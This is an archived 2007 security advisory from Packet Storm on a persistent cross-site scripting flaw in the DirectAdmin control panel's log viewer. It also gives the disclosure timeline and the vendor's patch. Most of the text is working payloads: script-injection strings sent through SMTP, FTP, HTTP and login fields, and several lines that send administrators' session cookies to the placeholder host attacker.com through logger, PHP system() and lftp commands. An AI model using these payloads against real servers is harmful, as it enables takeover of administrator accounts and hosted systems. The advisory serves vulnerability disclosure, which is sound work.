exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

directadmin1293-xss.txt

directadmin1293-xss.txt
Posted Apr 3, 2007
Authored by Kanedaaa Bohater | Site kaneda.bohater.net

DirectAdmin versions below 1.29.3 are susceptible to a persistent cross site scripting attack.

tags | exploit, xss
SHA-256 | aecddc4ae8ca386f2b4c093ee49c6aed712e0a3f864740dc9a0f671d5638a37c
Download | Favorite | View

directadmin1293-xss.txt

Change Mirror Download
+ Subject:
DirectAdmin persistant XSS [takeover an Administrator`s account]

+ Version:
< DirectAdmin 1.29.3

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ DirectAdmin Description:
DirectAdmin is a popular, advanced Web Control Panel with many features 
for webhosting. www.directadmin.com

+ Persistant XSS Description:
It is possible to take over an Administrator`s account by injecting 
persistent XSS data to the System Logs [/var/log/*].
When DirectAdmin's Administrator goes to Admin Tools/Log Viewer and press 
"Show log" to display logs - he can be a victim of XSS attack and his 
session can be easily taken over - which means that it is possible to run 
any command with DirectAdmin's Administrator priviliges.

I found out that 7 from 15 log files in the menu, could be used as means 
of injecting XSS to a system with no login credentials required.
Next 3 of them are possible to be injected when you are logged as a valid 
user in the DirectAdmin.

I was testing DirectAdmin on default Debian 4.0 installation but in 
general it should be working for other platforms too (with small changes I 
guess).

Details:

I) Examples of an attack without login credentials:

1)
Log file: /var/log/exim/rejectlog, /var/log/exim/mainlog

Data is sent to IP with DirectAdmin to port 25:
vrfy </textarea><script>alert('0wned:'+escape(document.cookie));</script>

Lines in log files:
mainlog: 2007-03-23 19:24:49 H=attacker.com [123.123.123.123] rejected 
VRFY </textarea><script>alert('0wned:'+escape(document.cookie));</script>
rejectlog: 2007-03-23 19:24:49 H=attacker.com [123.123.123.123] rejected 
VRFY </textarea><script>alert('0wned:'+escape(document.cookie));</script>


2)
Log file: /var/log/proftpd/auth.log

Data is sent to IP with DirectAdmin to port 21:
user </textarea><script>alert('0wned:'+escape(document.cookie));</script>

Lines in log files:
auth.log:ProFTPd [28114] 123.123.123.123 [23/Mar/2007:19:29:26 +0100] 
"USER </textarea><script>alert('0wned:'+escape(document.cookie));</script>" 331


3)
Log file: /var/log/httpd/error_log

Data is sent to IP with DirectAdmin to port 80:
GET / </textarea><script>alert('0wned:'+escape(document.cookie));</script>

Lines in log files:
error_log:[Fri Mar 23 19:33:37 2007] [error] [client 123.123.123.123] 
request failed: erroneous characters after protocol string: GET / 
</textarea><script>alert('0wned:'+escape(document.cookie));</script>


4)
Log file: /var/log/httpd/access_Log

Data is sent to "free (not attached to any user)" IP to port 80 (using 
wget):
wget IP 
--user-agent="</textarea><script>alert('0wned:'+escape(document.cookie));</script>"

Lines in log files:
access_log:123.123.123.123 - - [23/Mar/2007:19:36:46 +0100] "GET / 
HTTP/1.0" 200 2673 "-" 
"</textarea><script>alert('0wned:'+escape(document.cookie));</script>"

5)
Log file: /var/log/directadmin/error.log

Data is sent to first DirectAdmin login page:
login: 
</textarea><script>alert('0wned:'+escape(document.cookie));</script>
password: any (not empty)

Lines in log files:
error.log:2007:03:23-19:39:44: Auth::passValid: unable to get user_info 
for </textarea><script>alert('0wned:'+escape(document.cookie));</script>

6)
Log file: /var/log/directadmin/security.log

Data is sent to first DirectAdmin login page:
login: 
</textarea><script>alert('0wned:'+escape(document.cookie));</script>

Lines in log files:
security.log:2007:03:23-19:39:44: *** 123.123.123.123 has tried to login 
with an invalid username: 
'</textarea><script>alert('0wned:'+escape(document.cookie));</script>' ***



II) Examples of an attack with login credentials:

1)
Log file: /var/log/directadmin/security.log
Via WWW: 
http://directadminsite:2222/CMD_ADDITIONAL_DOMAINS?domain=login.domain.com</textarea><script>alert('XSS');</script>

Via ftp login: lftp login@directadmin:/> get 
"</textarea><script>location.href='http://attacker.com/xss.php?cook='+escape(document.cookie)</script>"

2)
Log file: /var/log/messages
via php: <?php system('/usr/bin/logger 
"</textarea><script>location.href=\'http://attacker.com/xss.php?cook=\'+escape(document.cookie)</script>"'); 
?>

3)
Log file: /var/log/messages
via ssh: /usr/bin/logger 
"</textarea><script>location.href='http://attacker.com/xss.php?cook='+escape(document.cookie)</script>"


Timeline:
2007.02.25 bug discovered
2007.03.00 bug tested
2007.03.23 bug sent via Technical Support mail from http://www.directadmin.com/support.html
2007.03.24 fast response after few hours from DirectAdmin : Thanks for the report. Fix will be out within a few hours with DA 1.29.3
2007.03.24 DirectAdmin 1.29.3 Patched - Overview : use html characters for log viewer, Description: Ensure all charcters are html encoded when viewing logs through the log viewer.

Original Advisory: 
http://kaneda.bohater.net/security/20070323-directadmin_persistant_xss_takeover_administrator_account.php

-- 
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]..
[+] You can take our lives,but you will never take our Freedom - W.Wallace
[+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama
[+] Revolution the only solution - System of a down...
[+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0
[-] Kanedaaa... Bohateur... Cucumber Team Member...     kaneda@bohater.net
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close